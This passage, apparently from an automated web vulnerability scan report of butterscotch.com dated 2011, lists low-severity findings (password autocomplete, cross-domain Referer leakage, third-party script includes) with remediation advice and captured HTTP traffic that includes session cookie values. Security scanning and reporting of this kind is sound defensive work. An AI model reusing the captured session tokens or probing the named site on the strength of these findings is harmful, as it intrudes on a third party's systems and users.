Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

5.4. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

5.5. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/tutorials.html" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

6. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<a href="javascript: void(0);" onClick="fbConnect()">
<img src="http://static.ak.fbcdn.net/rsrc.php/zB6N8/hash/4li2k73z.gif" class='fb_connect'>
</a>
...[SNIP]...
<div class="ad300x250">
<iframe id='aed03704' name='aed03704' src='http://www8.tucows.com/delivery/afr.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:145&amp;cb=958ab849'
framespacing='0' frameborder='no' scrolling='no' width='300' height='250'>

<a href='http://www8.tucows.com/delivery/ck.php?n=ac55bf6f&amp;cb=958ab849' target='_blank'><img
src='http://www8.tucows.com/delivery/avw.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:145&amp;cb=958ab849&amp;n=ac55bf6f' border='0' alt='' />
</a></iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
</div>
<div class="ad300x250">
<iframe id='aed03704' name='aed03704' src='http://www8.tucows.com/delivery/afr.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:186&amp;cb=ac2cba24'
framespacing='0' frameborder='no' scrolling='no' width='300' height='250'>

<a href='http://www8.tucows.com/delivery/ck.php?n=ac55bf6f&amp;cb=ac2cba24' target='_blank'><img
src='http://www8.tucows.com/delivery/avw.php?what=Demogirl,_300x250,Facebook,_300x250,photos,_300x250|zone:186&amp;cb=ac2cba24&amp;n=ac55bf6f' border='0' alt='' />
</a></iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...
<br />
<a class="menufont ftrmnuitm" href="http://www.tucows.com/terms.html">Terms</a>
...[SNIP]...
<br />
<a class="menufont ftrmnuitm" href="http://www.tucows.com/sitemap.html">Site Map</a>
...[SNIP]...
<br />
<a class="menufont ftrmnuitm" href="https://author.tucows.com">Submit Software</a><br />
<a class="menufont ftrmnuitm" href="http://www.tucows.com/author_ratings.html">Ratings Guide</a>
...[SNIP]...
<div class="footerlinks col3">
<a class="menufont ftrmnuitm" href="http://www.tucows.com/affiliate/index.html">Become a Partner</a><br />
<a href="http://domainhelp.tucows.com">Domain Help</a><br />
<a href="http://www.tucowsinc.com/careers/">Jobs</a><br />
<a href="http://www.tucowsinc.com/">Services</a><br />
<a href="http://domainhelp.tucows.com/domains/whois/whoislookup/">Help & Whois</a>
...[SNIP]...
<br />
Butterscotch is a division of <a href="http://www.tucows.com">Tucows Inc</a>
...[SNIP]...
<div id="footercopyright">
<a rel="license" href="http://creativecommons.org/licenses/by-nc-nd/3.0/us/"><img alt="Creative Commons License" style="border-width:0" src="/images/assets/cc.gif" width=82 height=17 />
...[SNIP]...
</span> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-nd/3.0/us/">Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License</a>
...[SNIP]...

7. Cross-domain script include  previous
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. http://www.butterscotch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...

7.2. http://www.butterscotch.com/tutorials.html  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://www8.tucows.com/delivery/ag.php'></script>
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:28:29 CST 2011.